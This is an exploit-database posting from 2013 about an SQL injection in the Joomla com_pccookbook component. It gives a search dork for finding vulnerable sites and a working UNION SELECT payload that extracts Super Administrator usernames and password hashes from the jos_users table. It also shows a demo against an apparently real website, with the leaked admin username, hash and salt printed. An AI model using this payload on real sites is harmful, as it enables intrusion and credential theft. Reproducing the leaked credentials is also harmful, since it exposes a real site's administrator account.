joomla com_pccookbook Components Sql Injection vulnerability

2013-06-27 13:33:45
Posted by: irist.ir

#################################

# Iranian Exploit DataBase

# Www.exploit.IrIsT.Ir

#################################

# Exploit Title : joomla com_pccookbook Components Sql Injection vulnerability

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Home : http://exploit.IrIsT.Ir

# Software Link : http://www.joomla.org

# Security Risk : High

# Tested on : Linux

# Dork : inurl:index.php?option=com_pccookbook

#################################
Exploit :

# http://www.Site.com/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=[Sql]

# Dem0 :

# http://www.bpang.com/bp/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--

# Recipes of user: bpang:8654c89a107de0f0fb34c2ee7c7da8d4:wlFlfmbRhxm2OK4g:Super Administrator

#################################

# Exploit Archive : http://exploit.irist.ir/exploits-110.html

#################################

Fixes

No fixes

In order to submit a new fix you need to be registered.